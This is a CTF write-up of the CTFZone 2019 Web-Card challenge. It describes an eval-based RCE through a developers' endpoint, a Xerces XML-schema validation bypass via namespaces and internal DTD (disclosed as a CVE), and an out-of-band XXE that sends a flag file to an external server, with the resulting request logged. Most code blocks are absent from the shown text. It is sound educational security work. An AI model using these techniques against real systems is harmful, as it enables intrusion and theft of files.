This article describes the steps to solve the Web-Card task designed for CTFZone 2019. The task is a kind of tribute to the XML format and contains a 0-day (as of the competition dates), an unusual way to exploit XXE and a remarkable chain of vulnerabilities.
This write-up was drafted back in December 2019, but we couldn’t publish it until the vendor fixed the vulnerability. Better late than never. Have fun reading!
The landing page of this task has a form, which is used to send the information about a participant to generate a “truly original” card.
Under the hood, the data from the form is sent to /api/render
endpoint inside an XML-based message like this:
The response contains a complex SVG file with the data provided in the request:
STAGE 1
First attempt: XXE through request body
Checking basic XXE payloads gives us some information:
- There’s some XML processing with a standard Java SAX parser from
javax.xml.*
(standard error messages). file
andhttp
(https
) schemes are not allowed for general entities.- The Java web-application possibly uses Spring (standard JSON-object format for
Internal Server Error
).
Second attempt: Fuzzing payload format
Attempt to inject tags fails with an error. Doesn’t seem promising.
Sending invalid value for “int-typed” field results in some generic error.
Sending invalid string for type
-attribute reveals details about XML validation — type
-attribute value must be “str”, “int” or “float”.
Endpoint discovery
During standard web application enumeration the “/dev” folder can be found with a status code 403 Forbidden
and a “Developers only” message in the body.
Here’s a place for guessing. Why would some developer want to add an extra folder to the application with only one API endpoint? Probably for tests.
So we can check /dev/api/render
. And it works!
Third attempt: Fuzzing payload format through developers’ endpoint
Injection of tags, as well as of random type
fails again, but with a strange error format.
This is interesting: “invalid literal for int() with base 10” is a standard error message from Python. It occurs when you write something like this:
We already know that “str”, “int” and “float” are valid type
-attribute values for /api/render
. These are also names of valid objects from Python __builtins__
— standard builtin objects:
We can try to use an eval
function as a value for the type
-attribute and some string with a Python expression (100499+1
) as a value for the value
-attribute:
Server returns 100500
as a result of evaluation. This means that we are able to run arbitrary code in the context of the web application.
We use
eval
instead ofexec
, becauseexec
doesn’t return any value, but we want to see the result in the response instead ofNone
.
Investigating server through RCE
It’s time to make some preparations. To send arbitrary code for evaluation and ensure it runs as intended, it is good to write some code to automate these tasks.
Example of usage:
Result printed to console: “Application user is: app”
For simplicity, further in this article, every payload and result will be written as Python code with comments:
Searching for information
Listing application directory:
What do we see here?
bottle.py
— the Bottle, a single file web framework for Python.card_render
— an application folder with source filesnetwork-hint.md
— a file with a hint:
{internet} -> 80:[front] -> 4041:[waf]{FLAG is here} -> 3031:[app]
|
|
------> 3031:[app-dev]
So we are on app-dev
and our goal is to hack the waf
that works between the user and the production app
.
Network connectivity
Everybody wants a reverse shell after RCE, but its possibility depends on network connectivity. By means of a wget
or with a Python socket
module we can check that there's no TCP/UDP connection from app-dev
to the Internet.
Results
Now we know that:
app
is a Python web application that renders SVG and has an RCE vulnerability.app-dev
is an instance ofapp
, but for testing purposes.waf
is a Java web application that validates requests forapp
and makes theapp
's RCE not exploitable.- FLAG for this challenge is stored on the
waf
machine.
STAGE 2
WAF Bypass
We can make some preparations to do research on XML validation via java.xml.*
.
Here we have source code of the utility that tests an XML file against the XSD schema, schema.xsd
with schema definition and two test files: valid.xml
and invalid_num.xml
.
The schema restricts the structure of <root_element>
with a positive attribute nat
and an inner element <some_num>
with a decimal body.
valid.xml
is valid for schema.xsd
. invalid_num.xml,
has a non-decimal value inside the <some_num>
element and therefore is invalid.
Results of running the utility for XML files:
Playing with invalid XML document
Here you need to find a 0-day to bypass validation. There are not so many things you can play with: the internal DTD and namespaces.
You can add an xmlns
attribute to any tag to make it “namespaced” so that its definition can be searched in the specified namespace.
Testing the “namespaced” version results in another error message:
It looks like a validation engine “Cannot find the declaration of element ‘root_element’” in the h4ck3r
namespace.
But it’s not a problem though. We are able to add definitions by means of internal DTD:
PWNED! Validation is bypassed successfully. But what happened?
This is a bug in Apache Xerces 2 for Java. schema.xsd
defines validation rules in ''
namespace. In our payload we change the namespace to h4ck3r
and add a definition for <root_element>
to it. The validation engine has the wrong behavior — it unites the definitions from the schema and internal DTD, but must ignore everything not related to the schema.
STAGE 3
Now we can update our attacking script to work with the production API endpoint — adding WAF bypass logic:
Searching vectors to WAF
According to the network hint, there must be some vulnerability on the WAF that will expose the FLAG.
The possible candidates are:
- hidden vulnerable endpoint/service that is only accessible from the internal network
- XML processing of SVG-response from the
app
First of all, we need to find the IP address of the WAF. We could use some standard utilities to determine this IP but it’s not interesting. Another approach is to traverse the application's internals by means of Python's huge introspection capabilities.
We can see the call frames using the payload like this:
In the frame with the offset 11(depends on count of frames added by exploit payload) we can find IP of waf
in the REMOTE_ADDR
header:
Tests with the socket
module show that the firewall allows only established connections from waf
to app
.
So the waf
attack surface is limited with an SVG-response from app
. Because of the XMLish nature of SVG it is obvious to use some XXE payload, but we need to figure out how to do that.
Attack on the way back
We need to replace SVG in the response from app
with our XXE payload.
By means of RCE we can dump the application code to see that there’s a function called render_svg_from_profile
that returns the final SVG as a string:
The function parse_and_render
uses original function object for render_svg_from_profile
imported to namespace of card_render.webapp
module. So, if we replace this function with our patched version within webapp
module, we can manipulate data in the response. This is an exec
-payload that defines a function patch_renderer
:
This function applies a one time patch with a secret condition that overrides the original function render_svg_from_profile
to return the attacker’s payload.
Example of usage:
A response with an invalid XML leads to error. Let’s run some tests:
Conclusions from the tests results:
- There is a response validation by SVG schema (tests 1, 5, 6, 7).
- During response validation,
waf
resolves external entities and allows external HTTP requests (test 3). - Invalid attribute value for SVG element
rect
is reflected in the response error message (test 7).
In terms of testing, it would be ideal to be able to place results of external entity resolution into the value of some attribute of the rect
element. And this is possible to achieve with DTD: <!ATTLIST rect height CDATA “500">
. This piece of DTD defines default value for height
attribute of the rect
element.
<!ATTLIST ...>
is an attribute declaration in DTD (simple explanation here).
So we can prepare an external DTD that does the same thing except it takes the default value from internal DTD context:
Payload with file reading or directory listing capabilities:
Note that
%height_default;
is defined in internal DTD but used inside external DTD. This is very convenient when remote part of payload stays constant.
We can apply this payload to list the directories on the waf
:
We see the “/app” folder and list it in the same way:
“/app/flag1998.txt” is our goal. But if we try to read it:
Ok, we are detected, but we can send it in an OOB manner:
And WIN:
172.42.73.7 - [11/Feb/2021 03:13:37]
"GET /?ctf.zone{78806158f1928b18ec1a583c0b9b82c5} HTTP/1.1" 200 -
The whole chain
BONUS: Original design w/o simplification :)
Originally, the waf
had no connection to the Internet. So, OOB XXE was not applicable.
I assumed that the participants would guess that they can register a new endpoint in the app
to store atk.dtd
. Also, in the original version there was no filtering of error messages so the flag could be gained via an error message.
The idea of intended patching was very tasty, but we were not sure that everyone will patch it in a silent manner with blackjack and secret conditions. So, it could lead to a situation when someone patches app
and all the participants get a flag. To fix this, we decided to filter the flag in error messages from waf
and allow the Internet as a channel to deliver the flag outside the regular flow.
Credits
Roman Shemyakin (@ramon93i7) — Design, Implementation, CVE-2020–14621
Vlad Lazarev (@Val1d) — “Roma, please, make it s1mpler!”